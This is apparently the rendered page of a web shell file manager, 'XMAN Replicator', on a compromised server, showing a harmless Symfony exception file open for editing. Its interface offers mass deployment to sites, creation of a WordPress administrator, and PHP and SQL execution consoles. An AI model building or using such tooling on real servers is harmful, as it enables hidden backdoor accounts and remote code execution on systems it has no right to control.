🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
php53
/
usr
/
share
/
pear
/
Symfony
/
Component
/
Security
/
Csrf
/
Exception
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:55
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:55
🔄
🗑️
🗑️📁
⬇️
🔒
TokenNotFoundException.php
474 B
-rw-r--r--
2019-12-18 11:20
✏️
🔄
🗑️
⬇️
🔒
Edit: TokenNotFoundException.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Security\Csrf\Exception; use Symfony\Component\Security\Core\Exception\RuntimeException; /** * @author Bernhard Schussek <bschussek@gmail.com> */ class TokenNotFoundException extends RuntimeException { }
Save
PHP Console
Execute
SQL Console
Execute